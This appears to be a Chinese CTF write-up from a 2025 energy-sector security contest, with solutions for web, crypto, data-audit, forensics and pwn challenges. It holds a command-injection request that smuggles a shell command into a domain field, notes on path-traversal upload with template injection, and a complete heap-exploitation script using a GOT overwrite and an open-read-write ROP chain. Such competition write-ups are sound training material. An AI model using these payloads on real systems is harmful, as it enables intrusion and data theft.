2025年能源网络安全大赛-初赛-能源组 WP
能源行业
Upload
导出http对象
Mirror
测试 url 编码可以绕过,
POST / HTTP/1.1
Host: 114.215.185.237:29262
Content-Length: 35
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://114.215.185.237:29262
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://114.215.185.237:29262/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=7oeKH3zkKVYT2u6Hu3EobZ3n6eEbz6mA; cut_data="{\"remaining\": 91.07928746378997\054 \"cut_count\": 17}"
Connection: close
domain=www.sohu.com%26%26head /fla[g]
balls
#include <stdint.h>
#include <assert.h>
#include <stdint-gcc.h>
#include "stdio.h"
const int DELTA = 0x12341234;
void decrypt_xtea(unsigned int rounds, unsigned int *data, const uint32_t *key, const uint32_t *sum_array);
void encrypt(unsigned int rounds, uint32_t *data, const uint32_t *key) {
int sum = 0;
unsigned int v1;
unsigned int v0;
v0 = data[0];
v1 = data[1];
for (int i = 0; i < rounds; ++i) {
v0 += (key[sum & 3] + sum) ^ (v1 + ((v1 >> 5) ^ (v1 << 4)));
sum += DELTA;
if (sum >> 0x1F)
sum ^= 0x9876543;
v1 += (key[(sum >> 11) & 3] + sum) ^ (v0 + ((v0 >> 5) ^ (v0 << 4)));
}
data[0] = v0;
data[1] = v1;
printf("\nsum: %x\n", sum);
}
void decrypt(unsigned int rounds, unsigned int *data, int len, uint32_t *key, uint32_t sum_array[32]) {
// 每次处理2个整数(8字节),所以步长应该是2
for (int i = 0; i < len / sizeof(int); i += 2) {
decrypt_xtea(rounds, &data[i], key, sum_array);
}
}
void decrypt_xtea(unsigned int rounds, unsigned int *data, const uint32_t *key, const uint32_t *sum_array) {
int sum;
unsigned int v1;
unsigned int v0;
v0 = data[0];
v1 = data[1];
sum = sum_array[rounds - 1];
for (int i = 0; i < rounds; ++i) {
v1 -= (key[(sum >> 11) & 3] + sum) ^ (v0 + ((v0 >> 5) ^ (v0 << 4)));
if (i < rounds - 1)
sum = sum_array[rounds - i - 1 - 1];
else
sum = 0; // 最后时 sum = 0
v0 -= (key[sum & 3] + sum) ^ (v1 + ((v1 >> 5) ^ (v1 << 4)));
}
*data = v0;
data[1] = v1;
}
// 计算并存储每轮的sum值
void calculate_sum_array(unsigned int rounds, int *sum_array) {
int sum = 0;
for (int i = 0; i < rounds; ++i) {
sum += DELTA;
if (sum >> 0x1F >= 0)
sum ^= 0x9876543;
sum_array[i] = sum;
}
}
int main() {
setbuf(stdout, NULL);
uint32_t key[] = {2, 2, 3, 4};
char encrypt_data[] = {0x00,0xB5,0x73,0x12,0x3E,0xF4,0x07,0x85,0x83,0x48,0x2B,0x7D,0x2A,0x16,0x91,0xA8,0x39,0xFA,0xD5,0xAC,0x2A,0x11,0xB5,0xF1,0xCF,0x9F,0x95,0xDD,0xEA,0x27,0x36,0x82};
int rounds = 32;
int sum_array[32] = {0};
calculate_sum_array(rounds, sum_array);
// encrypt(rounds, (uint32_t *) plain, key);
size_t count = sizeof encrypt_data;
decrypt(rounds, (uint32_t *) encrypt_data, count, key, sum_array);
for (int i = 0; i < sizeof encrypt_data; ++i) {
printf("%c", encrypt_data[i]);
}
return 0;
}
Web
Web_EasyXSS | 未完成
robots.txt 得到密码。爆破进去。
Web_phsys
看 filemodel.php 上传文件的时候可以路径穿越。可以上传文件覆盖/views/view.tpl 然后 ssti show source 直接读 flag构造发包就好了
Web_EEEEEE | 未完成
在Cookies中砍完得到
您好👋,这是一份提示,secret_key字段在ctf_config表里
robots.txt
Disallow: /api/user/list
Disallow: /api/user/register
Disallow: /api/user/login
Disallow: /admin
http://114.215.185.237:25241/api/user/register
注册成功
{
"username": "admin1",
"password": "admin1",
"email": "admin1@admin.coim"
}
http://114.215.185.237:25241/api/user/register
http://114.215.185.237:25241/api/user/login
可以登录。
{
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxMSwiaXNfYWRtaW4iOiIwIiwiZXhwIjoxNzQ0ODYwMjc2LjEzNDkzNDJ9.weM_HPxaJZ8gptL56iupA4leATHIU2hINuMnDrn6ibY"
}
会给token
Internal-JDBC-Hack | 未完成
Crypto
eazy_crypto
#!/usr/bin/env python3
from itertools import product
# —— 在这里粘你的公钥列表和密文 —— #
public_key =[685013477, 1370026954, 2740053908, 5480107816, 10960215632, 21920431264, 43840862528, 87681725056, 175363450112, 350726900224, 701453800448, 1402907600896, 2805815201792, 5611630403584, 11223260807168, 22446521614336, 44893043228672, 89786086457344, 179572172914688, 359144345829376, 718288691658752, 1436577383317504, 2873154766635008, 5746309533270016, 11492619066540032, 22985238133080064, 45970476266160128, 91940952532320256, 183881905064640512, 367763810129281024, 735527620258562048, 1471055240517124096, 2942110481034248192, 5884220962068496384, 11768441924136992768, 23536883848273985536, 47073767696547971072, 94147535393095942144, 188295070786191884288, 376590141572383768576, 753180283144767537152, 1506360566289535074304, 3012721132579070148608, 6025442265158140297216, 12050884530316280594432, 24101769060632561188864, 48203538121265122377728, 96407076242530244755456, 192814152485060489510912, 385628304970120979021824, 771256609940241958043648, 1542513219880483916087296, 3085026439760967832174592, 6170052879521935664349184, 12340105759043871328698368, 24680211518087742657396736, 49360423036175485314793472, 98720846072350970629586944, 197441692144701941259173888, 394883384289403882518347776, 789766768578807765036695552, 1579533537157615530073391104, 3159067074315231060146782208, 6318134148630462120293564416, 12636268297260924240587128832, 25272536594521848481174257664, 50545073189043696962348515328, 101090146378087393924697030656, 202180292756174787849394061312, 404360585512349575698788122624, 808721171024699151397576245248, 1617442342049398302795152490496, 3234884684098796605590304980992, 6469769368197593211180609961984, 12939538736395186422361219923968, 25879077472790372844722439847936, 51758154945580745689444879695872, 103516309891161491378889759391744, 207032619782322982757779518783488, 414065239564645965515559037566976, 828130479129291931031118075133952, 1656260958258583862062236150267904, 3312521916517167724124472300535808, 6625043833034335448248944601071616, 13250087666068670896497889202143232, 26500175332137341792995778404286464, 53000350664274683585991556808572928, 106000701328549367171983113617145856, 212001402657098734343966227234291712, 424002805314197468687932454468583424, 848005610628394937375864908937166848, 1696011221256789874751729817874333696, 3392022442513579749503459635748667392, 6784044885027159499006919271497334784, 13568089770054318998013838542994669568, 27136179540108637996027677085989339136, 54272359080217275992055354171978678272, 108544718160434551984110708343957356544, 217089436320869103968221416687914713088, 434178872641738207936442833375829426176, 868357745283476415872885666751658852352, 1736715490566952831745771333503317704704, 3473430981133905663491542667006635409408, 6946861962267811326983085334013270818816, 13893723924535622653966170668026541637632, 27787447849071245307932341336053083275264, 55574895698142490615864682672106166550528, 111149791396284981231729365344212333101056, 222299582792569962463458730688424666202112, 444599165585139924926917461376849332404224, 889198331170279849853834922753698664808448, 1778396662340559699707669845507397329616896, 3556793324681119399415339691014794659233792, 7113586649362238798830679382029589318467584, 14227173298724477597661358764059178636935168, 28454346597448955195322717528118357273870336, 56908693194897910390645435056236714547740672, 113817386389795820781290870112473429095481344, 227634772779591641562581740224946858190962688, 455269545559183283125163480449893716381925376, 910539091118366566250326960899787432763850752, 1821078182236733132500653921799574865527701504, 3642156364473466265001307843599149731055403008, 7284312728946932530002615687198299462110806016, 14568625457893865060005231374396598924221612032, 29137250915787730120010462748793197848443224064, 58274501831575460240020925497586395696886448128, 116549003663150920480041850995172791393772896256, 233098007326301840960083701990345582787545792512, 466196014652603681920167403980691165575091585024, 932392029305207363840334807961382331150183170048, 1864784058610414727680669615922764662300366340096, 3729568117220829455361339231845529324600732680192, 7459136234441658910722678463691058649201465360384, 14918272468883317821445356927382117298402930720768, 29836544937766635642890713854764234596805861441536, 59673089875533271285781427709528469193611722883072, 119346179751066542571562855419056938387223445766144, 238692359502133085143125710838113876774446891532288, 477384719004266170286251421676227753548893783064576, 954769438008532340572502843352455507097787566129152, 1909538876017064681145005686704911014195575132258304, 3819077752034129362290011373409822028391150264516608, 7638155504068258724580022746819644056782300529033216, 15276311008136517449160045493639288113564601058066432, 30552622016273034898320090987278576227129202116132864, 61105244032546069796640181974557152454258404232265728, 122210488065092139593280363949114304908516808464531456, 244420976130184279186560727898228609817033616929062912, 488841952260368558373121455796457219634067233858125824, 977683904520737116746242911592914439268134467716251648, 1955367809041474233492485823185828878536268935432503296, 3910735618082948466984971646371657757072537870865006592, 7821471236165896933969943292743315514145075741730013184, 15642942472331793867939886585486631028290151483460026368, 31285884944663587735879773170973262056580302966920052736, 62571769889327175471759546341946524113160605933840105472, 125143539778654350943519092683893048226321211867680210944, 250287079557308701887038185367786096452642423735360421888, 500574159114617403774076370735572192905284847470720843776, 1001148318229234807548152741471144385810569694941441687552, 2002296636458469615096305482942288771621139389882883375104, 4004593272916939230192610965884577543242278779765766750208, 8009186545833878460385221931769155086484557559531533500416, 16018373091667756920770443863538310172969115119063067000832, 32036746183335513841540887727076620345938230238126134001664, 64073492366671027683081775454153240691876460476252268003328, 128146984733342055366163550908306481383752920952504536006656, 256293969466684110732327101816612962767505841905009072013312, 512587938933368221464654203633225925535011683810018144026624, 1025175877866736442929308407266451851070023367620036288053248, 2050351755733472885858616814532903702140046735240072576106496, 4100703511466945771717233629065807404280093470480145152212992, 8201407022933891543434467258131614808560186940960290304425984, 16402814045867783086868934516263229617120373881920580608851968, 32805628091735566173737869032526459234240747763841161217703936, 65611256183471132347475738065052918468481495527682322435407872, 131222512366942264694951476130105836936962991055364644870815744, 262445024733884529389902952260211673873925982110729289741631488, 524890049467769058779805904520423347747851964221458579483262976, 1049780098935538117559611809040846695495703928442917158966525952, 95743002220203365521516392648555370826107558876295087647078391, 191486004440406731043032785297110741652215117752590175294156782, 382972008880813462086065570594221483304430235505180350588313564, 765944017761626924172131141188442966608860471010360701176627128, 1531888035523253848344262282376885933217720942020721402353254256, 1059958875395634827090817339320633846270141586031903574420534999, 116100555140396784583927453208129672374982874054267918555096485, 232201110280793569167854906416259344749965748108535837110192970, 464402220561587138335709812832518689499931496217071674220385940, 928804441123174276671419625665037378999862992434143348440771880]
c = 5130209653431579204059070331103048181426810462112058691052551084
# —————————————————————————— #
n = len(public_key)
def try_with(M):
"""给定 M,尾部长度 T = n - M - 1,暴力枚举尾部并贪心解前缀。"""
T = n - M - 1
if T <= 0 or T > 20:
return None
print(f"[+] 尝试 M={M},T={T},共 {2**T} 种尾部组合 …")
for beta in product([0,1], repeat=T):
tail_sum = sum(beta[j] * public_key[M+1+j] for j in range(T))
rem = c - tail_sum
if rem < 0:
continue
# 贪心解前缀
f = [0]*(M+1)
for i in range(M, -1, -1):
if rem >= public_key[i]:
f[i] = 1
rem -= public_key[i]
if rem == 0:
bits = ''.join(str(b) for b in f) + ''.join(str(b) for b in beta)
num = int(bits, 2)
B = (len(bits)+7)//8
flag_bytes = num.to_bytes(B, 'big')
try:
flag = flag_bytes.decode('ascii')
except UnicodeDecodeError:
continue
# 只要能打印,立刻返回
return flag
return None
# —— 第一步:试图自动找出 wrap 点 —— #
wrap_idx = None
for i in range(1, n):
if public_key[i] < public_key[i-1]:
wrap_idx = i-1
print(f"[+] 自动检测到 pk 在 i={wrap_idx+1} 处开始下降,取 M={wrap_idx}")
break
# —— 第二步:若检测成功就只试这一组,否则试所有可能的 M —— #
if wrap_idx is not None:
flag = try_with(wrap_idx)
if flag:
print("=== 解出 flag:", flag)
exit(0)
else:
print("[!] 用自动检测到的 M 没能解出,改为全盘尝试 ...")
# 第三步:枚举所有可能的尾部长度(M 从 n-2 到 0)—— #
for T in range(1, 21):
M = n - T - 1
if M < 0:
break
flag = try_with(M)
if flag:
print("=== 解出 flag:", flag)
exit(0)
print("[×] 所有尝试均失败,建议:")
print(" 1) 确认 public_key 列表和 c 值是否正确;")
print(" 2) 打印一下 public_key 前 20 项,手动观察 where wrap happens;")
print(" 3) 检查是不是有粘贴错误或漏掉逗号。")
simplesigin
from Crypto.Util.number import long_to_bytes
n = 91717197306065801430692774296739087369692505805873730729014813677164858033475119219496549179322145782790263228034134781592967028480301579462111507372893508636592832600206391905790511488678949157112322777098684707325311891056750963286494634489093620270797637437274546909400418496263799669541769586017282231886023275686719495040493703402244867906367008837217453500300992995258096509545406775279177918160331853363991834113918051468978309081085686108283547874975768959542753094631595260890420558364636303078263220001513817844063960023424429484568985727987064710176511050208253838039386390968276801658300795687804601169987051671314061987254212363117325786734328360418591971610392966867659045907550755979167652038093091970078722854251659581538266806207906127491377972897441916942048136016416739633568604447564119372465662628724153812001753748410162478969725179843125714619352895967577899670208386148053595763674920185320834513587
c = 42839011426405997183903064099635369826330453992570625970187419298692038242873340653343908015720875659378036817158685551628122217251118628262238465344190964816124580515458311589588181306296351778223861262126155125515973896503862879452134790831154504719292417905542768994118748777728649139178447183393367548054248947947431492235965656603368249032481251726201814793707367255423795360154002568107516580925236531750315901863488819318860921565896077238102673526816090928925925751075205315025490968147316509309315086832359525106203975670062755669310591511541201410020995195041443209092074953245174428606205236898973322350365005188942046012164423380551528973172062821695472964847483144558009935347106019767003947501794910291787761506146324383099394195404192915582482886260648618931172730212751598584218599542997084683196266265460113955019678010205955389076617695217597085275764572543474258054602748997334079905377228138451474442238
gift1 = 513
gift2 = 5077110719426498428662246006638349628986894614097694065336047422264042823893900747327210766546701290926253205743419412459378571920759093322149140413682875156857171051511499793127787270654329155934268596972449238336868326196360992252498463385
e = 0x10001
# Precompute M = 2^820
M = 2^820
# Iterate over possible x values (0 to 1023)
found = False
for x in range(0, 1024):
# Construct c for current x
c_val = (gift2 << 20) + (x << 10) + gift1
# Define the polynomial modulo n
PR.<a> = PolynomialRing(Zmod(n), implementation='NTL')
f = a * M + c_val
# Make the polynomial monic
f = f.monic()
# Find small roots (adjust parameters as needed)
try:
roots = f.small_roots(X=2^204, beta=0.33, epsilon=0.02)
except:
continue
if roots:
for root in roots:
a_val = int(root)
p_candidate = a_val * M + c_val
# Check if p_candidate divides n
if p_candidate !=0 and n % p_candidate == 0:
print(f"Found x = {x}")
print(f"p = {p_candidate}")
# Factor q and r from n/p
qr = n // p_candidate
# Find q and r (consecutive primes)
# Start near sqrt(qr)
q = isqrt(qr)
while True:
if qr % q == 0:
r_candidate = qr // q
if next_prime(q) == r_candidate:
print(f"q = {q}")
print(f"r = {r_candidate}")
# Compute phi and decrypt
phi = (p_candidate-1)*(q-1)*(r_candidate-1)
d = inverse_mod(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print("Flag:", flag)
found = True
break
# Check previous primes in case sqrt was overestimated
prev_q = previous_prime(q)
if prev_q and qr % prev_q == 0:
r_candidate = qr // prev_q
if next_prime(prev_q) == r_candidate:
print(f"q = {prev_q}")
print(f"r = {r_candidate}")
phi = (p_candidate-1)*(prev_q-1)*(r_candidate-1)
d = inverse_mod(e, phi)
m = pow(c, d, n)
flag = long_to_bytes(m)
print("Flag:", flag)
found = True
break
if found:
break
q += 1 # Increment to check next possible q
if found:
break
if found:
break
if found:
break
import gmpy2
# 已知参数
n = 91717197306065801430692774296739087369692505805873730729014813677164858033475119219496549179322145782790263228034134781592967028480301579462111507372893508636592832600206391905790511488678949157112322777098684707325311891056750963286494634489093620270797637437274546909400418496263799669541769586017282231886023275686719495040493703402244867906367008837217453500300992995258096509545406775279177918160331853363991834113918051468978309081085686108283547874975768959542753094631595260890420558364636303078263220001513817844063960023424429484568985727987064710176511050208253838039386390968276801658300795687804601169987051671314061987254212363117325786734328360418591971610392966867659045907550755979167652038093091970078722854251659581538266806207906127491377972897441916942048136016416739633568604447564119372465662628724153812001753748410162478969725179843125714619352895967577899670208386148053595763674920185320834513587
c = 42839011426405997183903064099635369826330453992570625970187419298692038242873340653343908015720875659378036817158685551628122217251118628262238465344190964816124580515458311589588181306296351778223861262126155125515973896503862879452134790831154504719292417905542768994118748777728649139178447183393367548054248947947431492235965656603368249032481251726201814793707367255423795360154002568107516580925236531750315901863488819318860921565896077238102673526816090928925925751075205315025490968147316509309315086832359525106203975670062755669310591511541201410020995195041443209092074953245174428606205236898973322350365005188942046012164423380551528973172062821695472964847483144558009935347106019767003947501794910291787761506146324383099394195404192915582482886260648618931172730212751598584218599542997084683196266265460113955019678010205955389076617695217597085275764572543474258054602748997334079905377228138451474442238
e = 0x10001
p = 3477634305546435927144616128460405250629463598739893239816622473608462839499113119946824017810719873339090526901633334291915897266888038660079222244131141455801199895718590378634837198073159021685321370770688205297565282784367872112989609728187391912702894751801426189113088741174943793100295289840652581377
q = 162399030363070924408658553342566621301865431412428199405276984452053313800746433925173396548817699021323394634719083758326973744580449458453418752068907138213058931545474946050685884721297474105183643109956009899293829385519759400010099257639127536920365563282821532319758427399499520953101076342669432069593
r = 162399030363070924408658553342566621301865431412428199405276984452053313800746433925173396548817699021323394634719083758326973744580449458453418752068907138213058931545474946050685884721297474105183643109956009899293829385519759400010099257639127536920365563282821532319758427399499520953101076342669432073067
phi = (p-1)*(q-1)*(r-1)
# init p q e c
from Crypto.Util.number import long_to_bytes
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
数据安全
数据校验
md5 https://www.sojson.com/md5/
A列-2065;B列-2964;
flag{md5}
超期账号未回收
Excel 制作公式
①筛选active列
②判断最后登录时间和过期时间判断
③共计3189个
flag{3189}
数据库审计
import re
import hashlib
# 定义违规类型
VIOLATION_TYPES = {
1: "不存在的账号执行操作",
2: "无权操作的表",
3: "超权限操作",
4: "非root权限操作"
}
# 解析用户权限配置文件
def parse_permissions(file_path):
permissions = {}
with open(file_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if not line:
continue
parts = line.split(',')
if len(parts) < 5:
continue
user_id = parts[0].strip()
username = parts[1].strip()
tables = [t.strip() for t in parts[2].strip().split(';')]
operations = [op.strip() for op in parts[3].strip().split(';')]
is_root = parts[4].strip().lower() == 'root'
permissions[username] = {
'id': user_id,
'tables': tables,
'operations': operations,
'is_root': is_root
}
return permissions
# 解析操作日志文件
def parse_logs(file_path):
logs = []
with open(file_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if not line:
continue
parts = line.split(' ', 4)
if len(parts) < 5:
continue
log_id = parts[0]
date = parts[1]
time = parts[2]
username = parts[3]
operation_info = parts[4]
# 解析操作类型和表名
operation_type = operation_info.split(' ')[0]
table_name = None
operation = None
if operation_type == 'QUERY':
table_parts = operation_info.split(' ')
if len(table_parts) > 1:
table_name = table_parts[1]
# 提取操作类型 (SELECT, INSERT, UPDATE, DELETE)
if 'operation=' in operation_info:
operation = operation_info.split('operation=')[1].strip()
logs.append({
'id': log_id,
'date': date,
'time': time,
'username': username,
'operation_type': operation_type,
'table_name': table_name,
'operation': operation
})
return logs
# 检测违规操作
def detect_violations(logs, permissions):
violations = []
for log in logs:
log_id = log['id']
username = log['username']
operation_type = log['operation_type']
table_name = log['table_name']
operation = log['operation']
# 检查违规类型1: 不存在的账号执行操作
if username not in permissions and operation_type not in ['LOGIN_FAILED']:
violations.append(f"1-{log_id}")
continue
# 跳过登录失败的记录
if operation_type == 'LOGIN_FAILED':
continue
# 检查违规类型4: 非root权限操作
if operation_type == 'GRANT' and not permissions[username]['is_root']:
violations.append(f"4-{log_id}")
continue
# 检查违规类型2: 无权操作的表
if table_name and table_name not in permissions[username]['tables'] and operation_type == 'QUERY':
violations.append(f"2-{log_id}")
continue
# 检查违规类型3: 超权限操作
if operation and operation_type == 'QUERY' and operation not in permissions[username]['operations']:
violations.append(f"3-{log_id}")
continue
return violations
# 生成最终答案
def generate_answer(violations):
# 按照日志编号排序
violations.sort(key=lambda x: int(x.split('-')[1]))
# 拼接违规记录
result = ','.join(violations)
# 计算MD5
md5_hash = hashlib.md5(result.encode()).hexdigest()
return result, md5_hash
def main():
# 文件路径
permissions_file = 'd:\\temp\\pytemp\\app1\\md51\\sjk\\user_permissions.txt'
logs_file = 'd:\\temp\\pytemp\\app1\\md51\\sjk\\database_logs.txt'
# 解析文件
permissions = parse_permissions(permissions_file)
logs = parse_logs(logs_file)
# 检测违规
violations = detect_violations(logs, permissions)
# 生成答案
result, md5_hash = generate_answer(violations)
print("检测到的违规操作:")
for v in violations:
print(v)
print("\n拼接结果:", result)
print("MD5哈希值:", md5_hash)
if __name__ == "__main__":
main()
Misc
alarm_clock
diskgenius打开vmdk搜索已删除文件进行恢复。
得到 wav和zip文件。
wav用qsstv播放得到解压密码和一张钟表的图。
z@Wa1uDu0
import matplotlib.pyplot as plt
import numpy as np
# 解析输入字符串
str_input = '''3,3,3,3,9,9,6,6,6,0,0,0,0,1,1,5,5 6,6,6,6,4,3,2 1,2,3,4,5,6,6,6,6,6,6,3,9,9,9,10,11,0,1,2,3,3'''
str_input ='''3,3,3,3,9,9,6,6,6,0,0,0,0,1,1,5,5
6,6,6,6,4,3,2
1,2,3,4,5,6,6,6,6,6,6,3,9,9,9,10,11,0,1,2,3,3
3,3,6,6,6,6,7,9,11,5,3,1,0,0,9,9,0,0
8,7,6,8,4,6,5,4
6,3,3,9,9,6,3,3,6,6,9,9
3,3,6,6,6,6,9,9,0,0,0,0,6,6,3,3
3,3,6,6,6,6
3,3,6,6,6,6,0,0,9,9,0,0
3,3,6,6,6,6,9,9,0,0,0,0
7,1,6,6,6,6,9,3,3
3,3,9,9,6,6,6,6,3,3,0,0,9,9
10,9,8,7,6,5,4,3,2
3,3
3,3,6,6,9,9,3,3,6,6,9,9
3,3,6,6,6,6,9,9,0,0,0,0
7,1,6,6,6,6,9,3,3
6,6,6,6,6,0,0,1,2,3,4,5,6,7,8,9,10,11,0
3,3
7,7,7,3,3,3,9,0,0,0,6,6,6,6,6
3,3,6,6,6,6,9,9,0,0,0,0,6,6,3,3
7,7,7,3,3,3,9,0,0,0,6,6,6,6,6
3,3,6,6,6,6,9,9,0,0,0,0
3,3
3,3,6,6,6,6,0,0,9,9,0,0
6,3,3,9,9,6,3,3,6,6,9,9
6,6,6,6,6,0,0,1,2,3,4,5,6,7,8,9,10,11,0
3,3,3,3,9,9,6,6,6,0,0,0,0,1,1,5,5
3,3
6,6,6,6,6,0,0,1,2,3,4,5,6,7,8,9,10,11,0
3,3,3,3,11,10,9,8,7,6,5,4,3,2,1
3,3,6,6,6,6
3,3,6,6,9,9,6,6,3,3
6,6,6,6,6,0,0,1,2,3,4,5,6,7,8,9,10,11,0
3,3,6,6,9,9,3,3,6,6,9,9
3,3,6,6,6,6
3,3,6,6,6,6,0,0,9,9,0,0
6,6,6,6,6,0,0,1,2,3,4,5,6,7,8,9,10,11,0
3,3,6,6,9,9,6,6,3,3
7,1,6,6,6,6,9,3,3
3,3,3,3,11,10,9,8,7,6,5,4,3,2,1
4,5,6,4,8,6,7,8
'''
segment_lines = str_input.splitlines()
# 方向映射(按钟表方向)
# 12点=0, 1点=1, 2点=2, 以此类推
directions = {
'0': (0, 1), # 12点方向
'1': (0.5, 0.866), # 1点方向
'2': (0.866, 0.5), # 2点方向
'3': (1, 0), # 3点方向
'4': (0.866, -0.5), # 4点方向
'5': (0.5, -0.866), # 5点方向
'6': (0, -1), # 6点方向
'7': (-0.5, -0.866), # 7点方向
'8': (-0.866, -0.5), # 8点方向
'9': (-1, 0), # 9点方向
'10': (-0.866, 0.5), # 10点方向
'11': (-0.5, 0.866) # 11点方向
}
# 初始化绘图
plt.figure(figsize=(10, 10))
x, y = 0, 0
plt.plot(x, y, 'ro') # 起点
# 绘制路径
for line in segment_lines:
segments = line.split()
for segment in segments:
steps = segment.split(',')
for step in steps:
if step in directions:
dx, dy = directions[step]
plt.arrow(x, y, dx, dy, head_width=0.1, head_length=0.1, fc='blue', ec='blue')
x += dx
y += dy
plt.plot(x, y, 'bo', markersize=5)
# 设置图形属性
plt.grid(True)
plt.axis('equal')
plt.title('钟表方向绘图')
# plt.savefig('a.png')
plt.show()
# flag{5879016c-301b-4840-95bf-be72b379b21e}
Bluetooth
tshark -r a.pcapng -e btl2cap.payload -T fields | sed -e "/^\s*$/d" > data.txt
import re
text = open("data.txt").read()
# 使用正则表达式提取特定位置的数字
digits = re.findall(r'^...............................(\d)..$', text, flags=re.M)
# 将提取的数字连接成字符串并按0分割
digit_str = ''.join(digits)
segments = [seg for seg in re.split(r'0+', digit_str) if seg]
# 从每个分段中提取第一个字符并转换数字映射
extracted_chars = ''.join(segment[0] for segment in segments)
converted_text = extracted_chars.translate(str.maketrans("1248", "0123"))
# 将4位一组的二进制数转换为ASCII字符
chunks = re.findall(r'(....)', converted_text)
result = ''.join(chr(int(chunk, 4)) for chunk in chunks)
print(result)
# flag{5a482ade-10ed-4905-a886-369846d27a08}
pwn
CFC
from pwn import *
dir = lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))
libc=ELF('./libc-2.31.so')
context.arch='amd64'
# p=process('./pwn1')
p = remote('ip',30612)
def command(option):
p.recvuntil(b'>>')
p.sendline(bytes(str(option),'utf-8'))
def create():
command(1)
p.recvuntil(b'Size')
p.sendline(bytes(str(0x20),'utf-8'))
def free(id):
command(3)
p.recvuntil(b'Idx')
p.sendline(bytes(str(id),'utf-8'))
def edit(id,Content):
command(2)
p.recvuntil(b'Idx')
p.sendline(bytes(str(id),'utf-8'))
p.recvuntil(b'Content')
p.send(Content)
create() # 0
create() # 1
free(1)
free(0)
edit(0,p64(0x4035A0))
create() # 2
create() # 1 # heap_ptr
free_got = 0x4034e0
read_got = 0x403510
my_puts = 0x4012D1
edit(1,p64(free_got))
edit(0,p64(my_puts))
heap_ptr = 0x4035A0
edit(1,p64(read_got))
free(0)
p.recvuntil(b':')
read_addr = u64(p.recv(6).ljust(8,b'\x00'))
libcbase = read_addr - libc.symbols['read']
system_addr = libcbase + libc.symbols['system']
gets_addr = libcbase + libc.symbols['gets']
env_addr = libcbase + 0x1ef600
dir("libcbase")
dir("env_addr")
edit(1,p64(env_addr))
free(0)
p.recvuntil(b':')
stack_addr = u64(p.recv(6).ljust(8,b'\x00'))
dir("stack_addr")
edit(1,p64(free_got)+p64(0x00000000004035a0)+b'flag\x00')
edit(0,p64(gets_addr))
target_addr = stack_addr - 0x128
edit(1,p64(target_addr))
# gdb.attach(p,'b* 0x4016E4')
free(0)
mprotect=libcbase+libc.sym['mprotect']
open_addr=libcbase+libc.sym['open']
read_addr=libcbase+libc.sym['read']
write_addr=libcbase+libc.sym['write']
rdi_ret=libcbase+0x0000000000023b6a
rsi_ret=libcbase+0x000000000002601f
rdx_ret=libcbase+0x0000000000142c92
flag_add = 0x4035b0
orw_rop = p64(rdi_ret+1)*4
orw_rop += p64(rdi_ret) + p64(flag_add) + p64(rsi_ret) + p64(0)+ p64(open_addr)
orw_rop += p64(rdi_ret) + p64(3) + p64(rsi_ret) + p64(flag_add) + p64(rdx_ret) + p64(0x100) + p64(read_addr)
orw_rop += p64(rdi_ret) + p64(1)+ p64(write_addr)
p.sendline(orw_rop)
p.interactive()
浙公网安备 33010602011771号